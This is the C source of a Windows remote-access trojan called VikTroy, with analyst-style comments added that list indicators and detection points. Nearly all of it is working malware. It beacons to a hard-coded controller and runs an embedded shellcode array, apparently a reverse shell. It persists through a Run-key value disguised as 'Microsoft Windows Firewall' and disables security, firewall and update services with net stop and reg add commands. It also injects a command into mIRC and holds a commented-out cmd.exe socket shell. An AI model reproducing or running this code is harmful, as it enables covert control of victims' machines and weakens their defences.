/*
   Autor: Coded by Rozor\xZR !Sub_Level
   IRC: irc.irc-hispano.org #sub_level
   URL: http://sincontrol.tomahost.org
   Lenguaje: C/C++ Win32
   Name: VikTroy
   Ejecutable: VikTroy.exe

*/


#include <windows.h>
#include <stdio.h>
#include <string.h>
#include <winsock.h>
#include <stdlib.h>
#include <process.h>
#include <winbase.h>
//#include <sys\types.h>
//#include <tlhelp32.h>

#pragma comment(lib, "wsock32.lib")


// Main socket: the single TCP connection opened in main() and shared by every thread that sends or receives
SOCKET sck;




// PAYLOAD: opaque byte array that Reverse() calls as machine code; its behaviour is not decoded in this file
unsigned char payload[] =

"\x33\xc9\x83\xe9\xb8\xe8"
"\xff\xff\xff\xff"
"\xc0\x5e\x81\x76\x0e\x4a"
"\x27\x98\xb9\x83\xee\xfc\xe2\xf4\xb6\x4d"
"\x73\xf4\xa2\xde\x67\x46"
"\xb5\x47\x13\xd5\x6e\x03\x13\xfc\x76\xac\xe4\xbc\x32\x26\x77\x32"
"\x05\x3f\x13\xe6\x6a\x26\x73\xf0\xc1\x13\x13\xb8\xa4\x16\x58\x20"
"\xe6\xa3\x58\xcd\x4d\xe6\x52\xb4\x4b\xe5\x73\x4d\x71\x73\xbc\x91"
"\x3f\xc2\x13\xe6\x6e\x26\x73\xdf\xc1\x2b\xd3\x32\x15\x3b\x99\x52"
"\x49\x0b\x13\x30\x26\x03\x84\xd8\x89\x16\x43\xdd\xc1\x64\xa8\x32"
"\x0a\x2b\x13\xc9\x56\x8a\x13\xf9\x42\x79\xf0\x37\x04\x29\x74\xe9"
"\xb5\xf1\xfe\xea\x2c\x4f\xab\x8b\x22\x50\xeb"
"\x8b\x15\x73\x67\x69" // w0w
"\x22\xec\x75\x45\x71\x77\x67"
"\x6f\x15\xae\x7d\xdf\xcb\xca\x90\xbb"
"\x1f\x4d\x9a\x46\x9a\x4f\x41\xb0\xbf\x8a\xcf\x46\x9c\x74\xcb\xea"
"\x19\x64\xcb\xfa\x19\xd8\x48\xd1\x35\x27\x98\xb8\x2c\x4f\x9a\x23"
"\x2c\x74\x11\x58\xdf\x4f\x74\x40\xe0\x47\xcf\x46\x9c\x4d\x88\xe8"
"\x1f\xd8\x48\xdf\x20\x43\xfe\xd1\x29\x4a\xf2\xe9\x13\x0e\x54\x30"
"\xad\x4d\xdc\x30\xa8\x16\x58\x4a\xe0\xb2\x11\x44\xb4\x65\xb5\x47"
"\x08\x0b\x15\xc3\x72\x8c\x33" // r0x
"\x12\x22\x55\x66\x0a\x5c\xd8\xed\x91"
"\xb5\xf1\xc3\xee\x18\x76\xc9\xe8"
"\x20\x26\xc9\xe8\x1f\x76\x67\x69"
"\x22\x8a\x41\xbc\x84\x74\x67\x6f\x20\xd8\x67\x8e\xb5\xf7\xf0\x5e"
"\x33\xe1\xe1\x46\x3f\x23\x67\x6f\xb5\x50\x64\x46\x9a\x4f\xe6\x61"
"\xa8\x54\xcb\x46\x9c"  // c0d3d
"\xd8\x48\xb9\x90\x90\x90";




// Thread Struct

/*
 * Bookkeeping record for one worker thread started by a command handler:
 * a short text label, the Win32 thread handle, and the thread id.
 */
typedef struct thread_struct
{
	char name[250];
	HANDLE Thread_Handle;
	int id;
} thread;

/* Fixed table of 10 records; CrearThread() writes into a slot picked with rand()%10. */
thread threads[10];





/* Command parser, thread-table helper, console hiding, and the payload launcher. */
int Comando(char recibido[130]);
int CrearThread(char *name, HANDLE Thread_Handle, int id);
void Esconder(void);
void Reverse(void);

/*
 * Thread entry points started from main() and Comando().
 * keyLogger is only declared: no definition and no caller appear in the
 * visible source.
 */
DWORD WINAPI pcInfo(LPVOID param);
DWORD WINAPI ownMirc(LPVOID param);
DWORD WINAPI Pong(LPVOID param);
DWORD WINAPI keyLogger(LPVOID param);
DWORD WINAPI revShell(LPVOID param);
DWORD WINAPI Infectar(LPVOID param);
DWORD WINAPI winFuck(LPVOID param);
DWORD WINAPI Happy(LPVOID param);





// INDEX

/*
 * Entry point: the client side of a remote-control channel.
 *
 * Sequence visible in the code:
 *   1. start Winsock and create one TCP socket (the global sck);
 *   2. hide the console window via Esconder();
 *   3. start the Pong() keep-alive thread;
 *   4. connect to the hard-coded address 127.0.0.1, port 80;
 *   5. send the greeting "HEllO";
 *   6. loop forever: read up to 128 bytes and, when more than 2 bytes
 *      arrive, hand the buffer to Comando().
 *
 * Analyst notes:
 *   - Network indicators in this function: the literal greeting "HEllO" sent
 *     right after connect; Pong() adds a periodic "PONG" on the same socket.
 *   - No return value (WSAStartup, socket, connect, send) is checked.
 *   - The statements after the for(;;) loop are unreachable.
 */
int main()
{ 
    HANDLE hThread;
	DWORD id;
	WSADATA wsa;
    struct sockaddr_in mysock;
	char recvbuff[130];
	char *hello = "HEllO";

	WSAStartup(MAKEWORD(1, 0), &wsa);
	sck = socket(AF_INET, SOCK_STREAM, 0);
	// Console is hidden before any network activity.
	Esconder();
	// Hard-coded controller endpoint (loopback, port 80, in this copy).
	mysock.sin_family = AF_INET;
	mysock.sin_addr.s_addr = inet_addr("127.0.0.1");
	mysock.sin_port = htons(80);
	memset(&(mysock.sin_zero), '\0', 8);
     
	// Keep-alive thread is created before the connection is attempted.
	hThread = CreateThread(NULL, 0, Pong, NULL, 0, &id);
	connect(sck, (struct sockaddr *)&mysock, sizeof(struct sockaddr));
	send(sck, hello, strlen(hello), 0);
	// Command loop: poll the socket roughly every 800 ms.
	for(;;)
	{
		 if(recv(sck, recvbuff, 128, 0)>2)
		 { 
		      Comando(recvbuff);
		 } 
		 Sleep(800);
	}

	// Unreachable: the loop above never exits.
    Sleep(1000);
	WSACleanup();
	system("PAUSE");
	return 1;
}






/*
 * Dispatches one message received from the controller.
 *
 * The text after the first '!' in recibido is compared, by prefix, against
 * a fixed command list. The checks are independent `if` statements, not an
 * else-if chain, so every one of them is evaluated for each message.
 *
 * Command prefixes (useful as content signatures for this channel):
 *   info, mirc, exit, shell (only the first 4 characters are compared),
 *   infectar, winfuck, showcmd, hidecmd, happy.
 *
 * Most commands start a worker thread and record it with CrearThread().
 *
 * Returns -1 (after printing "error") when the message has no '!',
 * otherwise 0.
 */
int Comando(char recibido[130])
{

	HANDLE hThread;
	DWORD id;

	char *pString;
	
	pString = strchr(recibido, '!');
	if(pString==NULL)
	{
		printf("error");
		return -1;
	}

	// Skip the '!' marker itself.
	pString++;
	
	// "info": report processor information (see pcInfo).
	if(strncmp(pString, "info", 4)==0)
	{
		hThread = CreateThread(NULL, 0, pcInfo, NULL, 0, &id);
		CrearThread("INFO", hThread, id);
		Sleep(1000);
	}

	// "mirc": drive a running mIRC client (see ownMirc).
	if(strncmp(pString, "mirc", 4)==0)
	{
		hThread = CreateThread(NULL, 0, ownMirc, NULL, 0, &id);
		CrearThread("MIRC", hThread, id);
	}

	// "exit": close the channel and kill the process by image name.
	if(strncmp(pString, "exit", 4)==0)
	{
		closesocket(sck);
		WSACleanup();
		system("taskkill /F /IM viktroy.exe");
	}

	// "shell": run the embedded payload (see revShell / Reverse).
	if(strncmp(pString, "shell", 4)==0)
	{
		hThread = CreateThread(NULL, 0, revShell, NULL, 0, &id);
		CrearThread("SHELL", hThread, id);
	}

	// "infectar": write the autorun registry value (see Infectar).
	if(strncmp(pString, "infectar", 8)==0)
	{
		hThread = CreateThread(NULL, 0, Infectar, NULL, 0, &id);
		CrearThread("INFE", hThread, id);
	}

	// "winfuck": stop and disable security-related services (see winFuck).
	if(strncmp(pString, "winfuck", 7)==0)
	{
		hThread = CreateThread(NULL, 0, winFuck, NULL, 0, &id);
		CrearThread("FUCK", hThread, id);
	}

	// "showcmd": make a console-class window visible again.
	if(strncmp(pString, "showcmd", 7)==0)
	{
		HWND hWnd;
	    hWnd = FindWindow("ConsoleWindowClass", NULL);
	    ShowWindow(hWnd, SW_SHOWNORMAL);
	}

	// "hidecmd": hide a console-class window.
	if(strncmp(pString, "hidecmd", 7)==0)
	{
		HWND hWnd;
	    hWnd = FindWindow("ConsoleWindowClass", NULL);
	    ShowWindow(hWnd, SW_HIDE);
	}

	// "happy": endless message-box loop (see Happy).
	if(strncmp(pString, "happy", 5)==0)
	{
		hThread = CreateThread(NULL, 0, Happy, NULL, 0, &id);
		CrearThread("HAPPY", hThread, id);
	}

	return 0;	 

}



/*
 * Executes the global payload[] byte array as machine code inside this
 * process: the array's address is stored into a function pointer (through a
 * cast to long) and then called.
 *
 * Analyst notes:
 *   - What the bytes do cannot be read from this file; the function name and
 *     the "shell" command suggest a reverse shell — confirm by disassembling
 *     in an isolated lab.
 *   - payload[] is an ordinary writable global, so control transfers into a
 *     data region rather than the program's code. Memory-execution
 *     protections and EDR rules for execution from non-code memory are the
 *     relevant controls for this pattern.
 */
void Reverse(void)
{
	  void(*rever)();
	  *(long *)&rever = (long)payload;
	  rever();

}

 // Disabled alternative to the shellcode call above (entirely commented out, so it is not compiled)
/*	PROCESS_INFORMATION pinfo;
	STARTUPINFO sinfo;
	SOCKET rsck;
	//WSADATA wsadata;
    struct sockaddr_in rSock;
    memset(&sinfo,0,sizeof(sinfo)); 
	//WSAStartup(MAKEWORD(1, 0), &wsadata);
	rsck = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
	rSock.sin_addr.s_addr = inet_addr("127.0.0.1");
	rSock.sin_family = AF_INET;
    bind(rsck, (struct sockaddr*)&rSock, sizeof(rSock));
	rSock.sin_port = htons(666);
	memset(&(rSock.sin_zero), 0, 8);
	
	connect(rsck, (struct sockaddr *)&rSock, sizeof(rSock));
	sinfo.cb = sizeof(sinfo);
	sinfo.dwFlags = STARTF_USESTDHANDLES;
	sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = rsck;
	CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, 0, 0, NULL, &sinfo, &pinfo);

  */



// ThreadGen
/*
 * Records a started thread in the global threads[] table.
 *
 * The slot is chosen with rand()%10, so a new record can overwrite an
 * earlier one; nothing in the visible source reads the table back.
 * name is passed to sprintf as the format string; every caller visible in
 * this file passes a fixed literal.
 *
 * Returns the index of the slot that was written.
 */
int CrearThread(char *name, HANDLE Thread_Handle, int id)
{
	int c = rand()%10;
	sprintf(threads[c].name,name);
	threads[c].id = id;
	threads[c].Thread_Handle = Thread_Handle;
	return c;
}


// HIDE
/*
 * Hides a console window so the program runs without a visible window.
 * The lookup is by window class only ("ConsoleWindowClass", no title), so
 * the window returned is whichever console-class window FindWindow finds.
 */
void Esconder(void)
{
	HWND hWnd;
	hWnd = FindWindow("ConsoleWindowClass", NULL);
	ShowWindow(hWnd, SW_HIDE);
}


// Arquitectura
/*
 * Thread routine for the "info" command.
 *
 * Reads the processor architecture and level with GetSystemInfo(), appends
 * short descriptive strings to the 16-byte allinfo buffer, renames the
 * machine with SetComputerName("xZ-Ownk"), and sends the text on the shared
 * socket sck.
 *
 * Analyst notes:
 *   - Host indicator: a computer-name change to "xZ-Ownk".
 *   - Network indicator: the Spanish status strings below ("Soy un INTEL ",
 *     "Soy un PocketPC ", ...) sent on the command channel.
 *
 * param is unused. Returns 0.
 */
DWORD WINAPI pcInfo(LPVOID param)
{
	SYSTEM_INFO sysinfo;
    char allinfo[16];
	GetSystemInfo(&sysinfo);
	// x86 family: level 3/4/5 is reported as 386/486/Pentium.
	if(sysinfo.wProcessorArchitecture==PROCESSOR_ARCHITECTURE_INTEL)
	{
		strcat(allinfo, "Soy un INTEL ");
		if(sysinfo.wProcessorLevel==3)
		{
			strcat(allinfo, "!386 ");
		}

		else if(sysinfo.wProcessorLevel==4)
		{
			strcat(allinfo, "!486 ");
		}
		
		else if(sysinfo.wProcessorLevel==5)
		{
			strcat(allinfo, "Pentium ");
		}

		else { strcat(allinfo, "unknow "); }

	}

	// PowerPC family: levels 1 and 3 both produce the same "PPC 601 " text.
	else if(sysinfo.wProcessorArchitecture==PROCESSOR_ARCHITECTURE_PPC)
	{
		strcat(allinfo, "Soy un PocketPC ");
		
		if(sysinfo.wProcessorLevel==1)
		{
			strcat(allinfo, "PPC 601 ");
		}
		
		else if(sysinfo.wProcessorLevel==3)
		{
			strcat(allinfo, "PPC 601 ");
		}

		else if(sysinfo.wProcessorLevel==20)
		{
			strcat(allinfo, "PPC 620 ");
		}

	}

	// Renames the host, then reports the collected text to the controller.
	SetComputerName("xZ-Ownk");
    send(sck, allinfo, strlen(allinfo), 0);
	return 0;

}


// mIRC command injection. Thanks to CrowDat for the explanation :P

/*
 * Thread routine for the "mirc" command.
 *
 * Walks the window hierarchy of a running mIRC client (classes "mIRC" >
 * "MDIClient" > "mIRC_Status" > "Edit") to reach the status window's input
 * box, writes the text "/run VikTroy.exe" into it with WM_SETTEXT, and then
 * sends a Return key message so that the client acts on that text.
 *
 * Analyst note: the effect is cross-process window messaging aimed at an
 * IRC client; the injected text "/run VikTroy.exe" is the indicator.
 *
 * param is unused. Returns 0.
 */
DWORD WINAPI ownMirc(LPVOID param)
{
	HWND hWnd;
	char run1[] = "/run VikTroy.exe";
	SetForegroundWindow(hWnd);
    hWnd = FindWindowEx(FindWindowEx(FindWindowEx(FindWindow("mIRC",
           NULL), 0, "MDIClient", 0),0, "mIRC_Status", 0), 0, "Edit", 0);

	SendMessage(hWnd, WM_SETTEXT, 0, (LPARAM)run1);
	SendMessage(hWnd, WM_IME_KEYDOWN, VK_RETURN, 0);
	Sleep(1500);
	return 0;
}


// Pong Conexion Thread

/*
 * Keep-alive thread started by main().
 *
 * Sends the 4-byte literal "PONG" on the shared socket sck every 25 seconds,
 * forever. The fixed interval and fixed content make this a regular beacon
 * that can be matched in network captures of the command channel.
 *
 * param is unused. The final return is unreachable.
 */
DWORD WINAPI Pong(LPVOID param)
{
	char *pong="PONG";
	for(;;)
	{
		Sleep(25000);
		send(sck, pong, strlen(pong), 0);
	}

	return 1;
}


// Reverse Shell Thread

/*
 * Thread routine for the "shell" command: a thin wrapper that calls
 * Reverse(), which executes the embedded payload[] bytes in this process.
 *
 * param is unused. Returns 0 if Reverse() returns.
 */
DWORD WINAPI revShell(LPVOID param)
{

    
    Reverse();
	return 0;

}


// Tripode

/*
 * Thread routine for the "infectar" command: registry autorun persistence.
 *
 * Targets the machine-wide Run key under HKEY_LOCAL_MACHINE and sets a
 * string value named "Microsoft Windows Firewall" whose data comes from
 * proceso ("VikTroy.exe"). The value name imitates a system component.
 *
 * Analyst notes:
 *   - Host indicator: a Run-key value named "Microsoft Windows Firewall"
 *     that refers to VikTroy.exe.
 *   - No return code is checked, so the code never learns whether the
 *     write succeeded; verify on the host rather than assuming.
 *   - direccion is declared but never used.
 *   - The function is declared DWORD but has no return statement.
 *
 * param is unused.
 */
DWORD WINAPI Infectar(LPVOID param)
{
	HKEY hKey;
	unsigned char direccion[] = "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run";
    unsigned char proceso[] = "VikTroy.exe";
	
	RegCreateKey(HKEY_LOCAL_MACHINE, "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" , &hKey);
	RegSetValueEx(hKey, "Microsoft Windows Firewall", 0, REG_SZ, proceso, sizeof("proceso"));
    RegCloseKey(hKey);
}






// WINDOWS FUCKEd x"DDDDDDDDDDD

/*
 * Thread routine for the "winfuck" command: defence impairment through
 * shell commands run with system().
 *
 * Commands issued, in order:
 *   - `net stop` for "Security Center" and "SharedAccess";
 *   - `reg add` setting Start = 0x4 (the "disabled" start type) for the
 *     SharedAccess, wuauserv and wscsvc services;
 *   - `reg add` writing an entry under the firewall policy's
 *     AuthorizedApplications\List key that refers to VikTroy.exe (the value
 *     name in the same command refers to ladyviky.exe).
 *
 * Analyst notes:
 *   - Each system() call spawns the command interpreter, so process-creation
 *     logs showing net.exe / reg.exe with these arguments are the primary
 *     detection point.
 *   - Registry auditing on the three service keys' Start value and on the
 *     AuthorizedApplications\List key covers the persistent changes.
 *   - Return codes are ignored; the function is declared DWORD but has no
 *     return statement.
 *
 * param is unused.
 */
DWORD WINAPI winFuck(LPVOID param)
{
	//HKEY hKey;
   // unsigned char proceso[] = "Start";
	system("net stop \"Security Center\"");
	system("net stop \"SharedAccess\"");
    system("reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\" /v Start /t REG_DWORD /d 0x4 /f");
    system("reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\wuauserv\" /v Start /t REG_DWORD /d 0x4 /f");
    system("reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\wscsvc\" /v Start /t REG_DWORD /d 0x4 /f");
    system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List /v %systemroot\\sytem32\\ladyviky.exe /t REG_SZ /d \"%systemroot%\\system32\\VikTroy.exe:*:Enabled:VikTroy\" /f");

}



// Funcion Feliz 

/*
 * Thread routine for the "happy" command: a nuisance message-box loop.
 *
 * Shows an error-icon message box with the author's banner text and, each
 * time it is dismissed with one of the listed button results, shows it
 * again. The loop never exits, so the final return is unreachable.
 *
 * Analyst note: the banner text and the caption "by xZR !Sub_Level" are
 * fixed strings in the binary and usable as static signatures.
 *
 * param is unused.
 */
DWORD WINAPI Happy(LPVOID param)
{
	int a = 0;
    char *Texto = " Troyano simple :P              \n"
		          " http://sincontrol.tomahost.org \n"
				  " Rebeld                         \n"
				  " irc-hispano.org #sub_level     \n"
				  " by xZR !Sub_Level Security     \n";

	a = MessageBox(NULL, 
		      Texto, 
			  "by xZR !Sub_Level",
			  MB_OK | MB_ICONERROR | MB_DEFBUTTON4);
   // Re-display the box after every dismissal.
   for(;;)
   {
    	if(a==IDOK || a==IDYES || a==IDABORT || a==IDCANCEL || a==IDNO)
		{
           a= MessageBox(NULL, 
		                Texto, 
			           "by xZR !Sub_Level",
                        MB_OK | MB_ICONERROR | MB_DEFBUTTON4);
	}
  
  }

  return -1;

}


// by xZR !Sub_Level
// EOF

